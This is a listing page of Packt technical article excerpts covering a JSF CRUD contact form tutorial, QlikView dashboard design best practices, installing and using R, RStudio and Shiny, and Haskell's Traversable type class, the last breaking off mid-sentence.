 In this article by Peter Pilgrim, author of the book Java EE 7 Web Application Development, we will learn about Java Server Faces as an example of a component-oriented web application framework. As opposed to Java EE 8 MVC, WebWork or Apache Struts, which are known as request-oriented web application frameworks. A request-oriented framework is one where the information flow is web request and response. Such frameworks provide ability and structure above the javax.servlet.http.HttpServletRequest and javax.servlet.http.HttpServletResponse objects, but there are no special user interface components. The application user with additional help must program mapping of parameters and attributes to the data entity models. The developer therefore has to write parsing logic. It is important to understand that component-oriented frameworks like JSF have their detractors. The quick inspection of the code resembles components like in standalone client like Java Swing or even JavaFX, but behind the scenes lurks the very same HttpServletRequest and HttpServletResponse. Hence, a competent JSF developer has to be still aware of the Servlet API and the underlying servlet scopes. This was a valid criticism in 2004 and in the digital marketing age, a digital developer has to know not only Servlet, we can presume they would be open to learning other technologies such as JavaScript. (For more resources related to this topic, see here.) Create Retrieve Update and Delete In this article, we are going to solve everyday problem with JSF. Java EE framework and enterprise application are about solving data entry issues. Unlike social networking software that is built with a different architecture and non-functional requirements: scalability, performance, statelessness, and eventual consistency, Java EE applications are designed for stateful work flows. Following is the screenshot of the page view for creating contact details: The preceding screenshot is the JSF application jsf-crud, which shows contact details form. Typically an enterprise application captures information from a web user, stores it in a data store, allows that information to be retrieved and edited. There is usually an option to delete the user's information. In software engineering, we call this idiom, Create Retrieve Update and Delete (CRUD). What constitutes actual deletion of user and customer data is a matter ultimately that affects business owners who are under pressure to conform to local and international law that define privacy and data protection. Basic create entity JSF form Let's create a basic form that captures the user's name, e-mail address and date of birthday. We shall write this code using HTML5 and take advantage of the Bootstrap for modern day CSS and JavaScript. See http://getbootstrap.com/getting-started/. Here is the JSF Facelet view createContact.xhtml: <!DOCTYPE html> <html > <h:head> <meta charset="utf-8"/> <title>Demonstration Application </title> <link href="#{request.contextPath}/resources/styles/bootstrap.css" rel="stylesheet"/> <link href="#{request.contextPath}/resources/styles/main.css" rel="stylesheet"/> </h:head> <h:body> <div class="main-container"> <div class="header-content"> <div class="navbar navbar-inverse" role="navigation"> </div> </div><!-- headerContent --> <div class="mainContent"> <h1> Enter New Contact Details </h1> <h:form id="createContactDetail" styleClass="form- horizontal" p_role="form"> ... </h:form> </div><!-- main-content --> <div class="footer-content"> </div> <!-- footer-content --> </div> <!-- main-container --> </h:body> <script src="#{request.contextPath}/resources/javascripts/jquery- 1.11.0.js"></script> <script src="#{request.contextPath}/resources/javascripts/bootstrap.js"> </script> <script src="#{request.contextPath}/resources/app/main.js"> </script> </html> You already recognise the <h:head> and <h:body> JSF custom tags. Because the type if a Facelet view (*.xhtml), the document is actually must be well formed like a XML document. You should have noticed that certain HTML5 elements tags like <meta> are closed and completed: the XHTML document must be well-formed in JSF. Always close XHTML elements The typical e-commerce application has web pages with standard HTML with <meta>, <link>, and <br> tags. In XHTML and Facelet views these tags, which web designers normally leave open and hanging, must be closed. Extensible Markup Language (XML) is less forgiving and XHTML, which is derived from XML, must be well formed. The new tag <h:form> is a JSF custom tag that corresponds to the HTML form element. A JSF form element shares many on the attributes of the HTML partner. You can see the idattribute is just the same. However, instead of the class attribute, we have in JSF, the styleClass attribute, because in Java the method java.lang.Object.getClass() is reserved and therefore it cannot be overridden. What is the JSF request context path expression? The curious mark up around the links to the style sheets, JavaScript and other resources is the expression language #{request.contextPath}. The expression reference ensures that the web application path is added to the URL of JSF resources. Bootstrap CSS itself relies on font glyph icons in a particular folder. JSF images, JavaScript modules files and CSS files should be placed in the resources folder of the web root. The p:role attribute is an example of JSF pass-through attribute, which informs the JSF render kit to send through the key and value to the rendered output. The pass-through attributes are important key addition in JSF 2.2, which is part of Java EE 7. They allow JSF to play well with recent HTML5 frameworks such as Bootstrap and Foundation (http://foundation.zurb.com/). Here is an extract of the rendered HTML source output. <h1> Enter New Contact Details </h1> <form id="createContactDetail" name="createContactDetail" method="post" action="/jsf-crud-1.0- SNAPSHOT/createContactDetail.xhtml" class="form-horizontal" enctype="application/x-www-form-urlencoded" role="form"> <input type="hidden" name="createContactDetail" value="createContactDetail" /> JSF was implemented before the Bootstrap was created at Twitter. How could the JSF designer retrofit the framework to be compatible with recent HTML5, CSS3, and JavaScript innovations? This is where pass-through attribute help. By declaring the XML namespace in the XHTML with the URI http:// is simply passed through to the output. The pass-through attributes allow JSF to easily handle HTML5 features such as placeholders in text input fields, as we will exploit from now onwards. If you are brand new to web development, you might be scared of the markup that appears over complicated. There are lots and lots of DIV HTML elements, which are often created by page designers and Interface Developers. This is the historical effect and just the way HTML and The Web has evolved over time. The practices of 2002 have no bearing on 2016. Let's take a deeper look at the <h:form> and fill in the missing details. Here is the extracted code: <h:form id="createContactDetail" styleClass="form-horizontal" p_role="form"> <div class="form-group"> <h:outputLabel for="title" class="col-sm-3 control-label"> Title</h:outputLabel> <div class="col-sm-9"> <h:selectOneMenu class="form-control" id="title" value="#{contactDetailController.contactDetail.title}"> <f:selectItem itemLabel="--" itemValue="" /> <f:selectItem itemValue="Mr" /> <f:selectItem itemValue="Mrs" /> <f:selectItem itemValue="Miss" /> <f:selectItem itemValue="Ms" /> <f:selectItem itemValue="Dr" /> </h:selectOneMenu> </div> </div> <div class="form-group"> <h:outputLabel for="firstName" class="col-sm-3 control-label"> First name</h:outputLabel> <div class="col-sm-9"> <h:inputText class="form-control" value="#{contactDetailController.contactDetail.firstName}" id="firstName" placeholder="First name"/> </div> </div> ... Rinse and Repeat for middleName and lastName ... <div class="form-group"> <h:outputLabel for="email" class="col-sm-3 control-label"> Email address </h:outputLabel> <div class="col-sm-9"> <h:inputText type="email" class="form-control" id="email" value="#{contactDetailController.contactDetail.email}" placeholder="Enter email"/> </div> </div> <div class="form-group"> <h:outputLabel class="col-sm-3 control-label"> Newsletter </h:outputLabel> <div class="col-sm-9 checkbox"> <h:selectBooleanCheckbox id="allowEmails" value="#{contactDetailController.contactDetail.allowEmails}"> Send me email promotions </h:selectBooleanCheckbox> </div> </div> <h:commandButton styleClass="btn btn-primary" action="#{contactDetailController.createContact()}" value="Submit" /> </h:form> This is from is built using the Bootstrap CSS styles, but we shall ignore the extraneous details and concentrate purely on the JSF custom tags. The <h:selectOneMenu> is a JSF custom tag that corresponds to the HTML Form Select element. The <f:selectItem> tag corresponds to the HTML Form Select Option element. The <h:inputText> tag corresponds to the HTML Form Input element. The <h:selectBooleanCheckbox> tag is a special custom tag to represent a HTML Select with only one Checkbox element. Finally, <h:commandButton> represents a HTML Form Submit element. JSF HTML Output Label The <h:outputLabel> tag renders the HTML Form Label element. <h:outputLabel for="firstName" class="col-sm-3 control-label"> First name</h:outputLabel> Developers should prefer this tag with conjunction with the other associated JSF form input tags, because the special for attribute targets the correct sugared identifier for the element. Here is the rendered output: <label for="createContactDetail:firstName" class="col-sm-3 control-label"> First name</label> We could have written the tag using the value attribute, so that looks like this: <h:outputLabel for="firstName" class="col-sm-3 control-label" value="firstName" /> It is also possible to take advantage of internationalization at this point, so just for illustration, we could rewrite the page content as: <h:outputLabel for="firstName" class="col-sm-3 control-label" value="${myapplication.contactForm.firstName}" /> JSF HTML Input Text The <h:inputText> tag allows data to be entered in the form like text. <h:inputText class="form-control" value="#{contactDetailController.contactDetail.firstName}" id="firstName" placeholder="First name"/> The value attribute represents a JSF expression language and the clue is the evaluation string starts with a hash character. Expression references a scoped backing bean ContactDetailController.java with the name of contactDetailController. In JSF 2.2, there are now convenience attributes to support HTML5 support, so the standard id, class, and placeholder attributes work as expected. The rendered output is like this: <input id="createContactDetail:firstName" type="text" name="createContactDetail:firstName" class="form-control" /> Notice that the sugared identifier createContactDetails:firstName matches the output of the <h:outputLabel> tag. JSF HTML Select One Menu The <h:selectOneMenu> tag generates a single select drop down list. If fact, it is part of a family of selection type custom tags. See the <h:selectBooleanCheckbox> in the next section. In the code, we have the following code: <h:selectOneMenu class="form-control" id="title" value="#{contactDetailController.contactDetail.title}"> <f:selectItem itemLabel="--" itemValue="" /> <f:selectItem itemValue="Mr" /> <f:selectItem itemValue="Mrs" /> <f:selectItem itemValue="Miss" /> <f:selectItem itemValue="Ms" /> <f:selectItem itemValue="Dr" /> </h:selectOneMenu> The <h:selectOneMenu> tag corresponds to a HTML Form Select tag. The value attribute is again JSF expression language string. In JSF, we can use another new custom tag <f:selectItem> to define in place option item. The <f:selectItem> tag accepts an itemLabel and itemValue attribute. If you set the itemValue and do not specify the itemLabel, then the value becomes the label. So for the first item the option is set to —, but the value submitted to the form is a blank string, because we want to hint to the user that there is a value that ought be chosen. The rendered HTML output is instructive: <select id="createContactDetail:title" size="1" name="createContactDetail:title" class="form-control"> <option value="" selected="selected">--</option> <option value="Mr">Mr</option> <option value="Mrs">Mrs</option> <option value="Miss">Miss</option> <option value="Ms">Ms</option> <option value="Dr">Dr</option> </select> JSF HTML Select Boolean Checkbox The <h:selectBooleanCheckbox> custom tag is special case of selection where there is only one item that the user can choose. Typically, in web application, you will find such an element is the finally terms and condition form or usually in marketing e-mail section in an e-commerce application. In the targeted managed bean, the only value must be a Boolean type. <h:selectBooleanCheckbox for="allowEmails" value="#{contactDetailController.contactDetail.allowEmails}"> Send me email promotions </h:selectBooleanCheckbox> The rendered output for this custom tag looks like: <input id="createContactDetail:allowEmails" type="checkbox" name="createContactDetail:allowEmails" /> JSF HTML Command Button The <h:commandButton> custom tags correspond to the HTML Form Submit element. It accepts an action attribute in JSF that refers to a method in a backing bean. The syntax is again in the JSF expression language. <h:commandButton styleClass="btn btn-primary" action="#{contactDetailController.createContact()}" value="Submit" /> When the user presses this submit, the JSF framework will find the named managed bean corresponding to contactDetailController and then invoke the no arguments method createContact(). In the expression language, it is important to note that the parentheses are not required, because the interpreter or Facelets automatically introspects whether the meaning is an action (MethodExpression) or a value definition (ValueExpression). Be aware, most examples in the real world do not add the parentheses as a short hand. The value attribute denotes the text for the form submit button. We have could written the tag in the alternative way and achieve the same result. <h:commandButton styleClass="btn btn-primary" action="#{contactDetailController.createContact()}" > Submit </h:commandButton> The value is taken from the body content of the custom tag. The rendered output of the tag looks like something this: <input type="submit" name="createContactDetail:j_idt45" value="Submit" class="btn btn-primary" /> <input type="hidden" name="javax.faces.ViewState" id="j_id1:javax.faces.ViewState:0" value="-3512045671223885154:3950316419280637340" autocomplete="off" /> The above code illustrates the output from the JSF renderer in the Mojarra implementation (https://javaserverfaces.java.net/), which is the reference implementation. You can clearly see that the renderer writes a HTML submit and hidden element in the output. The hidden element captures information about the view state that is posted back to the JSF framework (postback), which allows it to restore the view. Finally, here is a screenshot of this contact details form: The contact details input JSF form with additional DOB fields Now let's examine the backing bean also known as the controller. Backing Bean controller For our simple POJO form, we need a backing bean or a modern day JSF developer parlance a managed bean controller. This is the entire code for the ContactDetailController: package uk.co.xenonique.digital; import javax.ejb.EJB; import javax.inject.Named; import javax.faces.view.ViewScoped; import java.util.List; @Named("contactDetailController") @ViewScoped public class ContactDetailController { @EJB ContactDetailService contactDetailService; private ContactDetail contactDetail = new ContactDetail(); public ContactDetail getContactDetail() { return contactDetail; } public void setContactDetail( ContactDetail contactDetail) { this.contactDetail = contactDetail; } public String createContact() { contactDetailService.add(contactDetail); contactDetail = new ContactDetail(); return "index.xhtml"; } public List<ContactDetail> retrieveAllContacts() { return contactDetailService.findAll(); } } For this managed bean, let's introduce you to a couple of new annotations. The first annotation is called @javax.inject.Named and it is declares this POJO to be CDI managed bean, which also simultaneously declares a JSF controller. Here, we declare explicitly the value of name of the managed bean as contactDetailController. This is actually the default name of the managed bean, so we could have left it out. We can also write an alternative name like this: @Named("wizard") @ViewScoped public class ContactDetailController { /* .. . */ } Then JSF would give as the bean with the name wizard. The name of the managed bean helps in expression language syntax. When we are talking JSF, we can interchange the term backing bean with managed bean freely. Many professional Java web develop understand that both terms mean the same thing! The @javax.faces.view.ViewScoped annotation denotes the controller has a life cycle of view scoped. The view scoped is designed for the situation where the application data is preserved just for one page until the user navigates to another page. As soon as the user navigates to another page JSF destroys the bean. JSF removes the reference to the view-scoped bean from its internal data structures and the object is left for garbage collector. The @ViewScoped annotation is new in Java EE 7 and JSF 2.2 and fixes a bug between the Faces and CDI specifications. This is because the CDI and JSF were developed independently. By looking at the Java doc, you will find an older annotation @javax.faces.bean.ViewScoped, which is come from JSF 2.0, which was not part of the CDI specification. For now, if you choose to write @ViewScoped annotated controllers you probably should use @ManagedBean. We will explain further on. The ContactDetailController also has dependency on an EJB service endpoint ContactDetailService, and most importantly is has a bean property ContactDetail. Note that getter and setter methods and we also ensure that the property is instantiated during construction time. We turn our attention to the methods. public String createContact() { contactDetailService.add(contactDetail); contactDetail = new ContactDetail(); return "index.xhtml"; } public List<ContactDetail> retrieveAllContacts() { return contactDetailService.findAll(); } The createContact() method uses the EJB to create a new contact detail. It returns a String, which is the next Facelet view index.xhtml. This method was referenced by the <h:commandButton>. The retrieveAllContacts() method invokes the data service to fetch the list collection of entities. This method will be referenced by another page. Summary In this article, we learned about JSF forms we explore HTML and core JSF custom tags in building the answer to one of the sought questions on the Internet. It is surprising that this simple idea is considered difficult to program. We built digital JSF form that initially created a contact detail. We saw the Facelet view, the managed bean controller, the stateful session EJB and the entity Resources for Article: Further resources on this subject: WebSockets in Wildfly[article] Prerequisites[article] Contexts and Dependency Injection in NetBeans [article]
Read more
  • 0
  • 0
  • 43283

Packt
25 Sep 2015
11 min read
Save for later

The Dashboard Design – Best Practices

Packt
25 Sep 2015
11 min read
 In this article by Julian Villafuerte, author of the book Creating Stunning Dashboards with QlikView you know more about the best practices for the dashboard design. (For more resources related to this topic, see here.) Data visualization is a field that is constantly evolving. However, some concepts have proven their value time and again through the years and have become what we call best practices. These notions should not be seen as strict rules that must be applied without any further consideration but as a series of tips that will help you create better applications. If you are a beginner, try to stick to them as much as you can. These best practices will save you a lot of trouble and will greatly enhance your first endeavors. On the other hand, if you are an advanced developer, combine them with your personal experiences in order to build the ultimate dashboard. Some guidelines in this article come from the widely known characters in the field of data visualization, such as Stephen Few, Edward Tufte, John Tukey, Alberto Cairo, and Nathan Yau. So, if a concept strikes your attention, I strongly recommend you to read more about it in their books. Throughout this article, we will review some useful recommendations that will help you create not only engaging, but also effective and user-friendly dashboards. Remember that they may apply differently depending on the information displayed and the audience you are working with. Nevertheless, they are great guidelines to the field of data visualization, so do not hesitate to consider them in all of your developments. Gestalt principles In the early 1900s, the Gestalt school of psychology conducted a series of studies on human perception in order to understand how our brain interprets forms and recognizes patterns. Understanding these principles may help you create a better structure for your dashboard and make your charts easier to interpret: Proximity: When we see multiple elements located near one another, we tend to see them as groups. For example, we can visually distinguish clusters in a scatter plot by grouping the dots according to their position. Similarity: Our brain associates the elements that are similar to each other (in terms of shape, size, color, or orientation). For example, in color-coded bar charts, we can associate the bars that share the same color even if they are not grouped. Enclosure: If a border surrounds a series of objects, we perceive them as part of a group. For example, if a scatter plot has reference lines that wrap the elements between 20 and 30 percent, we will automatically see them as a cluster. Closure: When we detect a figure that looks incomplete, we tend to perceive it as a closed structure. For example, even if we discard the borders of a bar chart, the axes will form a region that our brain will isolate without needing the extra lines. Continuity: If a number of objects are aligned, we will perceive them as a continuous body. For example, the different blocks of code when you indent QlikView script are percieved as one continuous code. Connection: If objects are connected by a line, we will see them as a group. For example, we tend to associate the dots connected by lines on a scatter plot with lines and symbols. Giving context to the data When it comes to analyzing data, context is everything. If you present isolated figures, the users will have a hard time trying to find the story hidden behind them. For example, if I told you that the gross margin of our company was 16.5 percent during the first quarter of 2015, would you evaluate it as a positive or negative sign? This is pretty difficult, right? However, what if we added some extra information to complement this KPI? Then, the following image would make a lot more sense: As you can see, adding context to the data can make the landscape look quite different. Now, it is easy to see that even though the gross margin has substantially improved during the last year, our company has some work to do in order to be competitive and surpass the industry standard. The appropriate references may change depending on the KPI you are dealing with and the goals of the organization, but some common examples are as follows: Last year's performance The quota, budget, or objective Comparison with the closest competitor, product, or employee The market share The industry standards Another good tip in this regard is to anticipate the comparisons. If you display figures regarding the monthly quota and the actual sales, you can save the users the mental calculations by including complementary indicators, such as the gap between them and the percentage of completion. Data-Ink Ratio One of the most interesting principles in the field of data visualization is Data-Ink Ratio, introduced by Edward R. Tufte in his book, The Visual Display of Quantitative Information, which must be read by every designer. In this publication, he states that there are two different types of ink (or in our case, pixels) in any chart, as follows: Data-ink: This includes all the nonerasable portions of graphic that are used to represent the actual data. These pixels are at the core of the visualization and cannot be removed without losing some of its content. Non-data-ink: This includes any element that is not directly related to the data or doesn't convey anything meaningful to the reader. Based on these concepts, he defined the Data Ink Ratio as the proportion of the graphic's ink that is devoted to the nonredundant display of data information: Data Ink Ratio = Data Ink / Total Ink As you can imagine, our goal is to maximize this number by decreasing the non-data-ink used in our dashboards. For example, the chart to the left has a low data-ink ratio due to the usage of 3D effects, shadows, backgrounds, and multiple grid lines. On the contrary, the chart to the right presents a higher ratio as most of the pixels are data-related. Avoiding chart junk Chart junk is another term coined by Tufte that refers to all the elements that distract the viewer from the actual information in a graphic. Evidently, chart junk is considered as non-data-ink and comprises of features such as heavy gridlines, frames, redundant labels, ornamental axes, backgrounds, overly complex fonts, shadows, images, or other effects included only as decoration. Take for instance the following charts: As you can see, by removing all the unnecessary elements in a chart, it becomes easier to interpret and looks much more elegant. Balance Colors, icons, reference lines, and other visual cues can be very useful to help the users focus on the most important elements in a dashboard. However, misusing or overusing these features can be a real hazard, so try to find the adequate balance for each of them. Excessive precision QlikView applications should use the appropriate language for each audience. When designing, think about whether precise figures will be useful or if they are going to become a distraction. Most of the time, dashboards show high-level KPIs, so it may be more comfortable for certain users to see rounded numbers, as in the following image: 3D charts One of Microsoft Excel's greatest wrongdoings is making everyone believe that 3D charts are good for data analysis. For some reason, people seem to love them; but, believe me, they are a real threat to business analysts. Despite their visual charm, these representations can easily hide some parts of the information and convey wrong perceptions depending on their usage of colors, shadows, and axis inclination. I strongly recommend you to avoid them in any context. Sorting Whether you are working with a list box, a bar chart, or a straight table, sorting an object is always advisable, as it adds context to the data. It can help you find the most commonly selected items in a list box, distinguish which slice is bigger on a pie chart when the sizes are similar, or easily spot the outliners in other graphic representations. Alignment and distribution Most of my colleagues argue that I am on the verge of an obsessive-compulsive disorder, but I cannot stand an application with unaligned objects. (Actually, I am still struggling with the fact that the paragraphs in this book are not justified, but anyway...). The design toolbar offers useful options in this regard, so there is no excuse for not having a tidy dashboard. If you take care of the quadrature of all the charts and filters, your interface will display a clean and professional look that every user will appreciate: Animations I have a rule of thumb regarding chart animation in QlikView—If you are Hans Rosling, go ahead. If not, better think it over twice. Even though they can be very illustrative, chart animations end up being a distraction rather than a tool to help us visualize data most of the time, so be conservative about their use. For those of you who do not know him, Hans Rosling is a Swedish professor of international health who works in Stockholm. However, he is best known for his amazing way of presenting data with GapMinder, a simple piece of software that allows him to animate a scatter plot. If you are a data enthusiast, you ought to watch his appearances in TED Talks. Avoiding scroll bars Throughout his work, Stephen Few emphasizes that all the information in a dashboard must fit on a single screen. Whilst I believe that there is no harm in splitting the data in multiple sheets, it is undeniable that scroll bars reduce the overall usability of an application. If the user has to continuously scroll right and left to read all the figures in a table, or if she must go up and down to see the filter panel, she will end up getting tired and eventually discard your dashboard. Consistency If you want to create an easy way to navigate your dashboard, you cannot forget about consistency. Locating standard objects (such as Current Selections Box, Search Object, and Filter Panels) in the same area in every tab will help the users easily find all the items they need. In addition, applying the same style, fonts, and color palettes in all your charts will make your dashboard look more elegant and professional. White space The space between charts, tables, and filters is often referred to as white space, and even though you may not notice it, it is a vital part of any dashboard. Displaying dozens of objects without letting them breathe makes your interface look cluttered and, therefore, harder to understand. Some of the benefits of using white space adequately are: The improvement in readability It focuses and emphasizes the important objects It guides the users' eyes, creating a sense of hierarchy in the dashboard It fosters a balanced layout, making your interface look clear and sophisticated Applying makeup Every now and then, you stumble upon delicate situations where some business users try their best to hide certain parts of the data. Whether it is about low sales or the insane amount of defective products, they often ask you to remove a few charts or avoid visual cues so that those numbers go unnoticed. Needless to say, dashboards are tools intended to inform and guide the decisions of the viewers, so avoid presenting misleading visualizations. Meaningless variety As a designer, you will often hesitate to use the same chart type multiple times in your application fearing that the users will get bored of it. Though this may be a haunting perception, if you present valuable data in an adequate format, there is no need to add new types of charts just for variety's sake. We want to keep the users engaged with great analyses, not just with pretty graphics. Summary In this article, you learned all about the best practices to be followed in Qlikview. Resources for Article: Further resources on this subject: Analyzing Financial Data in QlikView[article] Securing QlikView Documents[article] Common QlikView script errors [article]
Read more
  • 0
  • 0
  • 9683
article-image-introducing-r-rstudio-and-shiny
Packt
25 Sep 2015
9 min read
Save for later

Introducing R, RStudio, and Shiny

Packt
25 Sep 2015
9 min read
 In this article, by Hernán G. Resnizky, author of the book Learning Shiny, the main objective will be to learn how to install all the needed components to build an application in R with Shiny. Additionally, some general ideas about what R is will be covered in order to be able to dive deeper into programming using R. The following topics will be covered: A brief introduction to R, RStudio, and Shiny Installation of R and Shiny General tips and tricks (For more resources related to this topic, see here.) About R As stated on the R-project main website: "R is a language and environment for statistical computing and graphics." R is a successor of S and is a GNU project. This means, briefly, that anyone can have access to its source codes and can modify or adapt it to their needs. Nowadays, it is gaining territory over classic commercial software, and it is, along with Python, the most used language for statistics and data science. Regarding R's main characteristics, the following can be considered: Object oriented: R is a language that is composed mainly of objects and functions. Can be easily contributed to: Similar to GNU projects, R is constantly being enriched by user's contributions either by making their codes accessible via "packages" or libraries, or by editing/improving its source code. There are actually almost 7000 packages in the common R repository, Comprehensive R Archive Network (CRAN). Additionally, there are R repositories of public access, such as bioconductor project that contains packages for bioinformatics. Runtime execution: Unlike C or Java, R does not need compilation. This means that you can, for instance, write 2 + 2 in the console and it will return the value. Extensibility: The R functionalities can be extended through the installation of packages and libraries. Standard proven libraries can be found in CRAN repositories and are accessible directly from R by typing install.packages(). Installing R R can be installed in every operating system. It is highly recommended to download the program directly from http://cran.rstudio.com/ when working on Windows or Mac OS. On Ubuntu, R can be easily installed from the terminal as follows: sudo apt-get update sudo apt-get install r-base sudo apt-get install r-base-dev The installation of r-base-dev is highly recommended as it is a package that enables users to compile the R packages from source, that is, maintain the packages or install additional R packages directly from the R console using the install.packages() command. To install R on other UNIX-based operating systems, visit the following links: http://cran.rstudio.com/ http://cran.r-project.org/doc/manuals/r-release/R-admin.html#Obtaining-R A quick guide to R When working on Windows, R can be launched via its application. After the installation, it is available as any other program on Windows. When opening the program, a window like this will appear: When working on Linux, you can access the R console directly by typing R on the command line: In both the cases, R executes in runtime. This means that you can type in code, press Enter, and the result will be given immediately as follows: > 2+2 [1] 4 The R application in any operating system does not provide an easy environment to develop code. For this reason, it is highly recommended (not only to write web applications in R with Shiny, but for any task you want to perform in R) to use an Integrated Development Environment (IDE). About RStudio As with other programming languages, there is a huge variety of IDEs available for R. IDEs are applications that make code development easier and clearer for the programmer. RStudio is one of the most important ones for R, and it is especially recommended to write web applications in R with Shiny because this contains features specially designed for R. Additionally, RStudio provides facilities to write C++, Latex, or HTML documents and also integrates them to the R code. RStudio also provides version control, project management, and debugging features among many others. Installing RStudio RStudio for desktop computers can be downloaded from its official website at http://www.rstudio.com/products/rstudio/download/ where you can get versions of the software for Windows, MAC OS X, Ubuntu, Debian, and Fedora. Quick guide to RStudio Before installing and running RStudio, it is important to have R installed. As it is an IDE and not the programming language, it will not work at all. The following screenshot shows RStudio's starting view: At the first glance, the following four main windows are available: Text editor: This provides facilities to write the R scripts such as highlighting and a code completer (when hitting Tab, you can see the available options to complete the code written). It is also possible to include the R code in an HTML, Latex, or C++ piece of code. Environment and history: They are defined as follows: In the Environment section, you can see the active objects in each environment. By clicking on Global Environment (which is the environment shown by default), you can change the environment and see the active objects. In the History tab, the pieces of codes executed are stored line by line. You can select one or more lines and send them either to the editor or to the console. In addition, you can look up for a certain specific piece of code by typing it in the textbox in the top right part of this window. Console: This is an exact equivalent of R console, as described in Quick guide of R. Tabs: The different tabs are defined as follows: Files: This consists of a file browser with several additional features (renaming, deleting, and copying). Clicking on a file will open it in editor or the Environment tab depending on the type of the file. If it is a .rda or .RData file, it will open in both. If it is a text file, it will open in one of them. Plots: Whenever a plot is executed, it will be displayed in that tab. Packages: This shows a list of available and active packages. When the package is active, it will appear as clicked. Packages can also be installed interactively by clicking on Install Packages. Help: This is a window to seek and read active packages' documentation. Viewer: This enables us to see the HTML-generated content within RStudio. Along with numerous features, RStudio also provides keyboard shortcuts. A few of them are listed as follows: Description Windows/Linux OSX Complete the code. Tab Tab Run the selected piece of code. If no piece of code is selected, the active line is run. Ctrl + Enter ⌘ + Enter Comment the selected block of code. Ctrl + Shift + C ⌘ + / Create a section of code, which can be expanded or compressed by clicking on the arrow to the left. Additionally, it can be accessed by clicking on it in the bottom left menu. ##### ##### Find and replace. Ctrl + F ⌘ + F The following screenshots show how a block of code can be collapsed by clicking on the arrow and how it can be accessed quickly by clicking on its name in the bottom-left part of the window: Clicking on the circled arrow will collapse the Section 1 block, as follows: The full list of shortcuts can be found at https://support.rstudio.com/hc/en-us/articles/200711853-Keyboard-Shortcuts. For further information about other RStudio features, the full documentation is available at https://support.rstudio.com/hc/en-us/categories/200035113-Documentation. About Shiny Shiny is a package created by RStudio, which enables to easily interface R with a web browser. As stated in its official documentation, Shiny is a web application framework for R that makes it incredibly easy to build interactive web applications with R. One of its main advantages is that there is no need to combine R code with HTML/JavaScript code as the framework already contains prebuilt features that cover the most commonly used functionalities in a web interactive application. There is a wide range of software that has web application functionalities, especially oriented to interactive data visualization. What are the advantages of using R/Shiny then, you ask? They are as follows: It is free not only in terms of money, but as all GNU projects, in terms of freedom. As stated in the GNU main page: To understand the concept (GNU), you should think of free as in free speech, not as in free beer. Free software is a matter of the users' freedom to run, copy, distribute, study, change, and improve the software. All the possibilities of a powerful language such as R is available. Thanks to its contributive essence, you can develop a web application that can display any R-generated output. This means that you can, for instance, run complex statistical models and return the output in a friendly way in the browser, obtain and integrate data from the various sources and formats (for instance, SQL, XML, JSON, and so on) the way you need, and subset, process, and dynamically aggregate the data the way you want. These options are not available (or are much more difficult to accomplish) under most of the commercial BI tools. Installing and loading Shiny As with any other package available in the CRAN repositories, the easiest way to install Shiny is by executing install.packages("shiny"). The following output should appear on the console: Due to R's extensibility, many of its packages use elements (mostly functions) from other packages. For this reason, these packages are loaded or installed when the package that is dependent on them is loaded or installed. This is called dependency. Shiny (on its 0.10.2.1 version) depends on Rcpp, httpuv, mime, htmltools, and R6. An R session is started only with the minimal packages loaded. So if functions from other packages are used, they need to be loaded before using them. The corresponding command for this is as follows: library(shiny) When installing a package, the package name must be quoted but when loading the package, it must be unquoted. Summary After these instructions, the reader should be able to install all the fundamental elements to create a web application with Shiny. Additionally, he or she must have acquired at least a general idea of what R and the R project is. Resources for Article: Further resources on this subject: R ─ Classification and Regression Trees[article] An overview of common machine learning tasks[article] Taking Control of Reactivity, Inputs, and Outputs [article]
Read more
  • 0
  • 0
  • 33103

article-image-patterns-traversing
Packt
25 Sep 2015
15 min read
Save for later

Patterns of Traversing

Packt
25 Sep 2015
15 min read
 In this article by Ryan Lemmer, author of the book Haskell Design Patterns, we will focus on two fundamental patterns of recursion: fold and map. The more primitive forms of these patterns are to be found in the Prelude, the "old part" of Haskell. With the introduction of Applicative, came more powerful mapping (traversal), which opened the door to type-level folding and mapping in Haskell. First, we will look at how Prelude's list fold is generalized to all Foldable containers. Then, we will follow the generalization of list map to all Traversable containers. Our exploration of fold and map culminates with the Lens library, which raises Foldable and Traversable to an even higher level of abstraction and power. In this article, we will cover the following: Traversable Modernizing Haskell Lenses (For more resources related to this topic, see here.) Traversable As with Prelude.foldM, mapM fails us beyond lists, for example, we cannot mapM over the Tree from earlier: main = mapM doF aTree >>= print -- INVALID The Traversable type-class is to map in the same way as Foldable is to fold: -- required: traverse or sequenceA class (Functor t, Foldable t) => Traversable (t :: * -> *) where -- APPLICATIVE form traverse :: Applicative f => (a -> f b) -> t a -> f (t b) sequenceA :: Applicative f => t (f a) -> f (t a) -- MONADIC form (redundant) mapM :: Monad m => (a -> m b) -> t a -> m (t b) sequence :: Monad m => t (m a) -> m (t a) The traverse fuction generalizes our mapA function, which was written for lists, to all Traversable containers. Similarly, Traversable.mapM is a more general version of Prelude.mapM for lists: mapM :: Monad m => (a -> m b) -> [a] -> m [b] mapM :: Monad m => (a -> m b) -> t a -> m (t b) The Traversable type-class was introduced along with Applicative: "we introduce the type class Traversable, capturing functorial data structures through which we can thread an applicative computation"                         Applicative Programming with Effects - McBride and Paterson A Traversable Tree Let's make our Traversable Tree. First, we'll do it the hard way: – a Traversable must also be a Functor and Foldable: instance Functor Tree where fmap f (Leaf x) = Leaf (f x) fmap f (Node x lTree rTree) = Node (f x) (fmap f lTree) (fmap f rTree) instance Foldable Tree where foldMap f (Leaf x) = f x foldMap f (Node x lTree rTree) = (foldMap f lTree) `mappend` (f x) `mappend` (foldMap f rTree) --traverse :: Applicative ma => (a -> ma b) -> mt a -> ma (mt b) instance Traversable Tree where traverse g (Leaf x) = Leaf <$> (g x) traverse g (Node x ltree rtree) = Node <$> (g x) <*> (traverse g ltree) <*> (traverse g rtree) data Tree a = Node a (Tree a) (Tree a) | Leaf a deriving (Show) aTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11)) -- import Data.Traversable main = traverse doF aTree where doF n = do print n; return (n * 2) The easier way to do this is to auto-implement Functor, Foldable, and Traversable: {-# LANGUAGE DeriveFunctor #-} {-# LANGUAGE DeriveFoldable #-} {-# LANGUAGE DeriveTraversable #-} import Data.Traversable data Tree a = Node a (Tree a) (Tree a)| Leaf a deriving (Show, Functor, Foldable, Traversable) aTree = Node 2 (Leaf 3) (Node 5 (Leaf 7) (Leaf 11)) main = traverse doF aTree where doF n = do print n; return (n * 2) Traversal and the Iterator pattern The Gang of Four Iterator pattern is concerned with providing a way "...to access the elements of an aggregate object sequentially without exposing its underlying representation"                                       "Gang of Four" Design 